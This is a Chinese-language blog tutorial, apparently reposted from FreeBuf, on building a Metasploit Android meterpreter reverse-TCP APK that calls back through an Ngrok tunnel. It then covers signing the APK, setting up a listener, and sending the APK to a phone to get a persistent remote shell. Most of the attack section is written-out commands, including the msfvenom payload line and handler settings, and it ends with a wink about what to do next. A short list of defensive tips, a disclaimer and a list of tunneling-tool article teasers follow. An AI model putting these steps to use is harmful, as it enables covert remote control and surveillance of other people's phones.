通過Metasploit+Ngrok穿透內網長期維持訪問外網Android設備

2020-12-05 深圳熱線
原標題:通過Metasploit+Ngrok穿透內網長期維持訪問外網Android設備

*本文原創作者:艾登——皮爾斯,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載

前言:

因為之前作為小白我不會在KaliLinux裡面把IP映射出外網,卡在那個地方很久,後來解決了這個問題就寫方法出來和大家分享分享。

環境:

KaliLinux系統(https://www.kali.org/downloads/)

Metasploit

NgrokLinux64位的埠轉發工具(https://www.ngrok.cc/)

1.在KaliLinux裡面打開https://www.ngrok.cc,下載裡面的Linux64位的埠轉發工具,到KaliLinux桌面備用

然後小夥伴需要自己去https://www.ngrok.cc/註冊一個帳號來開通一個免費的隧道,用於接下來的埠映射。

2.設置隧道:

隧道協議選擇TCP的,本地埠輸入KaliLinux的IP位址而埠號可以任意不要衝突就行了

設置好ngrok隧道之後就打開指定的sunny路徑運行埠轉髮腳本。

./sunnyclientidid

這個是埠轉髮腳本成功運行的樣子

3.用Metasploit生成載有惡意Payload的Android的apk並且籤名apk:

在KaliLinux裡面打開一個新的窗口輸入

msfvenom-pandroid/meterpreter/reverse_tcpLHOST=free.ngrok.ccLPORT=11***R>/root/Desktop/123.apk

執行下列命令籤名。首先使用密鑰工具創建密鑰庫。

keytool-genkey-v-keystoremy-release-key.Keystore-aliasalias_name-keyalgRSA-keysize2048-validity10000

然後使用JARsigner籤名APK

jarsigner-verbose-sigalgSHA1withRSA-digestalgSHA1-keystoremy-release-key.Keystore123.apkaliasname

再用JARsigner驗證籤名

jarsigner-verify-verbose-certs123.apk

如果你嫌上面的籤名apk的步驟很麻煩就直接在手機下載一個MT管理器進行對apk的籤名既方便又快捷。

4.使用Metasploit進行測試:

接下來啟動metasploit的監聽器。執行msfconsole打開控制臺。

useexploit/multi/handler

SetPAYLOADandroid/meterpreter/reverse_tcp

SETLHOST192.168.253.128(Kali的Linux內網IP)

SETLPORT2222(隧道的埠號)

Exploit

然後將載有payload的APK發送到手機上安裝等待反彈shell

接受反彈shell成功

sessions查看反彈shell

sessions-i[ID]進行回話操作

剩下的大家應該知道怎麼做了(眼神暗示)

注:如果你Kalilinux的內網IP變了,可以直接在隧道修改成你的內網IP然後在setLHOST設置成你內網IP然後run監聽即可。

防範方法:

1.手機沒事儘量不要root。

2.定期更新手機病毒庫,並且進行殺毒。

3.對於一些app申請的不必要的權限可以給予禁止。

4.手機直接安裝個殺毒軟體。

聲明:本文僅供技術交流,請勿利用本文章的攻擊手法對他人進行攻擊,出現一切法律糾紛,與本文作者無關。

*本文原創作者:艾登——皮爾斯,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載

相關焦點

  • 我們來親手搭建一個Ngrok內網穿透伺服器
    最近公司需要開發公眾號,在調試的時候就是個老大難問題,一般是需要內網穿透方式來讓外網能夠訪問到本地的程序,提高我們的開發調試效率,一般大家會才natapp、向日葵、ngrok等,這些都做得不錯,但是你要用得好、用得舒心,還是得花錢,剛好我之前花了三百多塊錢買了3年的雲主機,所以就想著要不自己折騰一個
  • 巧用內網穿透工具,解決本地伺服器外網訪問的問題
    下面列舉幾個比較常見的場景:1、開發測試時,對方需要設置聯調的域名或者IP,而本地環境無法滿足這個設置2、部署在本地的應用,如wiki,禪道以及管理系統等等,這些只能在本地區域網用192.168.1.x式的IP訪問,無法實現跨域或者跨網絡進行訪問3、產品經理相關的,產品經理可以在自己搭建伺服器,上傳原型
  • 免費搭建個人博客,花生殼無需公網IP內網穿透實現雲訪問!
    htdocs文件夾;然後打開本地網址127.0.0.1進行Z-Blog程序安裝;資料庫類型選擇mysql,默認密碼為空,其他的根據自己需要進行設置;安裝完成後,打開127.0.0.1就會顯示創建好的本地私人博客主頁;現在只能在本地查看,如果想在外網環境下訪問就需要用到花生殼內網穿透
  • 工業路由器內嵌花生殼PHTunnel,無公網IP實現LAN口設備外網訪問!
    作為國產老牌內網穿透服務商,花生殼始 終秉持初心,不斷為用戶提供簡單、高效、穩定的內網穿透服務,建立人與設備、設備與設備、網絡與網絡的互聯互通。經過十幾年技術沉澱,花生殼自主研發內網穿透軟體及硬體設備後,又免費開放內網穿透核心組件花生殼PHTunnel SDK,為個人及企業級開發者提供便利的嵌入式內網穿透解決方案。
  • 使用frp實現內網穿透管理物聯網設備
    內網穿透的概念及方法由於IP資源數量限制以及防火牆等原因,一般來說,我們的物聯網設備和私有伺服器都是沒有公網IP位址的,因此也無法通過外部網絡直接訪問,只有公有雲服務商或者專線接入的用戶,才有有限的獨立的公網IP位址可供訪問。
  • 內網穿透神器:不用破解路由也能隨時遠程訪問他人電腦!
    好在目前有比較好的解決上述成本方案就是:把網站放在內網(公司或家庭網絡),即動態ip指向,說的更通俗一點就是:想要別人在任何地點時間訪問你的網站,需要通過域名(IP位址也可)然後進入你網站,這個過程需要通過域名進行解析到你網站ip,然而通常這個網站ip是固定的,但你的網站在你內網上,訪問需要通過轉接進行解析,那麼這個轉接解析技術就是我今天要體驗的
  • 4G工業路由器內嵌花生殼PHTunnel,為工業物聯網提供智能內網穿透!
    繼北京盛訊美恆科技USB Server設備內嵌花生殼PHTunnel後,本次為大家分享佛山市拓界物聯科技有限公司4G工業路由器內嵌花生殼PHTunnel方案,實現通過4G路由器遠程訪問所連接的任何內網設備,為工業物聯網遠程編寫程序與調試,提供便捷的內網穿透服務
  • 用花生殼搭建突破內網訪問伺服器,春節期間也能做到高效管理
    如果沒有固定公網IP以及昂貴的專業設備,就很難遠程訪問公司內部的軟體系統,從而影響多地辦公的效率。那麼如何實現低成本並且快速的實現遠程辦公系統訪問?是很多企業一直迫切需求的。領先的網際網路應用服務者Oray推出的花生殼DDNS內網穿透技術,輕鬆幫助企業解決遠程互訪方面的痛點。
  • FRP內網穿透與遠程桌面——遠程控制與遠程工作
    本人簡單試用了一下,效果不錯,這個或許是以後的發展方向,桌面虛擬化走向大眾用戶,以後一般情況下就不用再買電腦了,一部手機,或者一臺瘦客戶終端(機頂盒),一臺顯示設備(顯示器、電視、投影),再配合寬帶或5G網絡,就可以連接雲電腦來完成自己的工作。6、花生殼、神卓互聯等內網穿透類服務這些內網穿透工具使用比較簡單,都是根據使用的帶寬收費的。
  • frp內網穿透服務搭建
    使用vi指令對目標文件進行編輯vi frps.inifrps.ini配置[common]部分是必須有的配置,其中bind_port是自己設定的frp服務端埠,vhost_http_port是自己設定的http訪問埠(可自定義)。
  • 多WAN無線路由器內嵌花生殼,埠映射實現設備跨網訪問!
    為增強服務功能,維盟科技與花生殼合作,將花生殼PHTunnel SDK集成到FBM_292W的WEB管理頁面,為用戶提供了便捷的內網穿透服務,幫助用戶解決相關應用的遠程訪問難題。  下面簡單介紹一下維盟科技路由器如何通過花生殼PHTunnel解決方案,快速實現異地設備的遠程外網訪問。
  • 伺服器搭建與內網穿透,一個花生棒Pro幫你搞定!
    ,設置簡單,需要本人手持身份證照片綁定認證初始化成功,1年的免費暢享服務,內網穿透,速率還好系統版本升級,藍燈,啟動服務,看面板燈變化燈未亮:設備未通電/軟硬體故障藍燈常亮:正常啟動花生殼服務紅燈閃爍:
  • 使用花生殼(內網穿透)服務搭建網站服務
    我們經常會遇到這樣的問題:我們做好了網站,為了便於管理,我們會直接將網站放在自己公司或者家裡的伺服器上,但是這樣就遇到了一個問題:我們使用的基本都是ADSL寬帶,寬帶服務商分配給我們的是區域網內部IP位址或80埠被屏蔽,無法直接在外網使用域名訪問網站。
  • p2p穿透技術是什麼
    P2P穿透軟體是指二點之間直接通信的軟體,它是沒有速度限制的,速度由二點之間的網絡傳輸速度決定。當前開放的p2p內網穿透軟體有nat123、hamachi、等。此文對P2P的概念,原理,應用等進行了分析與說明。一 .
  • 內網遠控電力系統,最簡單直接的外網控制方法
    後來才發現,原來電力局的網絡系統是內網,所有的文件數據都只能在公司的電腦上才能完成。也就是說,想加班可以,必須在公司才能加。(也許這就是,年紀輕輕的我走在街頭被叫"叔叔"的緣故吧!)還好平日裡在公司的人緣不錯,看我每天加班到那麼晚,關係不錯的同事悄悄告訴了我一個不用在公司加班的方法——向日葵控控A2,回家吃碗熱乎飯再加,更有力!
  • 沒有公網ip如何對外發布內網web站點
    河南圖奕網絡科技有限公司       外網訪問內網伺服器
  • 平升電子4G工業路由器內嵌花生殼PHTunnel,採集串口設備實現泵房...
    ,支持多種平臺接入,適配能力強,已經成功內嵌至智能網關、路由器、USB Server及NAS設備中,讓各種網絡和智能IoT設備快速具備了內網穿透功能,實現了內、外網信息數據的互聯互通。PHTunnel,實現了對路由器的遠程配置與維護,也實現通過4G工業路由器遠程訪問所連接的任何內網設備,進行工業數據遠程採集與傳輸、遠程監測與控制等,為其用戶提供了方便、快捷的內網穿透服務,極大地提高了服務品質。
  • 內網滲透|ATT&CK紅隊評估實戰靶場-2
    ip,和大致能描繪出內網基本拓撲圖,如上期所說,此靶場難度為易,非常適合練習內網滲透各種姿勢!在上篇中,通過CS的會話net view功能,探測出內網存活主機如下,確定了域控IP為192.168.52.138。那麼此時就已經本次滲透測試結束了,有了域控帳號密碼還有其ip,當然這就是靶場的特殊性所在,練習為主。實戰很難有這麼順利。這裡就引出我們第一種方法,可以進行CS的psexec模塊進行登錄。
  • frp 0.13.0 發布,內網穿透工具
    內網穿透工具 frp 0.13.0 發布了。